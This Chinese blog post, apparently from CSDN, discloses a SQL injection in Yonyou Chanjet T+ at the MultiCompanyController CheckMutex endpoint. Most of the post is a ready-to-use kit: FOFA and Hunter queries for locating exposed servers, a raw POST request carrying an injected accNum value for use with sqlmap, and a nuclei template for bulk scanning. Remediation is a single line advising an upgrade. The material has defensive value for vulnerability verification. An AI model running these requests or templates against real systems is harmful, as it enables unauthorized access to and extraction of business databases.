(附nuclei 批量验证文件)用友 畅捷通T+ MultiCompanyController SQL注入漏洞

(附nuclei 批量验证文件)用友 畅捷通T+ MultiCompanyController SQL注入漏洞

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1、漏洞简介

用友 畅捷通T+ MultiCompanyController 存在SQL注入漏洞,执行sql语句,获取数据库信息。

2、资产指纹

fofa:app=“畅捷通-TPlus”
hunter: app.name=“畅捷通 T+”

3、漏洞复现

使用以下数据包通过sqlmap进行测试

POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Content-Length: 53
Content-Type: text/plain
Cookie: ASP.NET_SessionId=; sid=admin
Accept-Encoding: gzip, deflate

{"accNum": "6'", "functionTag": "SYS0104", "url": ""}

在这里插入图片描述

4、nuclei yaml文件

id: chanjettplus-sqli

info:
  name: chanjettplus - SQL Injection
  author: XXX
  severity: critical
  description: |
    There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
  reference:
    - https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880
  tags: chanjettplus,sqli

http:
  - raw:
      - |
        POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain
        Cookie: ASP.NET_SessionId=; sid=admin

        {"accNum": "6'", "functionTag": "SYS0104", "url": ""}
    matchers:
      - type: word
        words:
          - "附近有语法错误"
        part: body

修复方式

关注用友官网,及时升级至最新版本。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值